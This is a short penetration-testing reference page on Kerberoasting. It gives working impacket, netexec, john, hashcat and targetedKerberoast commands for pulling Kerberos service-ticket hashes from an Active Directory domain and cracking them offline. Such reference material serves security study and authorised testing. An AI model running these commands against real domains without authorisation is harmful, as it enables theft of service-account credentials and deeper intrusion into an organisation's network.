Kerberoasting Attack

Kerberoasting is a attack technique against Kerberos with cracking passwords using a credential already gathered.

Basic Attack

If we have a password hash of a user, we might be able to find another user credential using the hash.

impacket-GetUserSPNs -hashes <lmhash>:<nthash> example.local/username -outputfile hashes.txt
# Without pre-authentication
# -no-preauth: https://github.com/SecureAuthCorp/impacket/pull/1413
impacket-GetUserSPNs -no-preauth username -usersfile users.txt -dc-host <ip-or-host> example.local/

netexec ldap <target-ip> -u username -p password --kerberoasting output.txt
netexec ldap <target-ip> -k --kerberoasting output.txt
netexec ldap <target-ip> -u '' -p '' --kerberoasting output.txt

After finding hashes, we can crack it or use for pass-the-hash attack. To crack, run the following commands:

john --format=krb5tgs --wordlist=wordlist.txt hash.txt
# or
hashcat -m 13100 -a 0 hash.txt wordlist.txt
# or
hashcat -m 19600 -a 0 hash.txt wordlist.txt
# or
hashcat -m 19700 -a 0 hash.txt wordlist.txt

Note that we may need to modify the hash format a bit so that john or hashcat can recognize it.

Get Hashes with TargetedKerberoast

TargetedKerberoast is a Python script that can print kerberoast hashes for user accounts that have a SPN set. We can get the hashes for users in the target machine.

# (Optional) Sync datetime for the target machine
sudo rdate -n example.com
# or
sudo ntpdate example.com

# Execute targetedKerberoast to get the hash.
git clone https://github.com/ShutdownRepo/targetedKerberoast
cd targetedKerberoast
python3 targetedKerberoast.py -d example.com -u 'username' -p 'password'

References

The Hacker Recipes

PreviousDACL (Discretionary Access Control List) Attack NextRBCD (Resource-Based Constrained Delegation) Attack

Last updated 1 month ago

hashtagBasic Attack

hashtagGet Hashes with TargetedKerberoast

hashtagReferences

Basic Attack

Get Hashes with TargetedKerberoast

References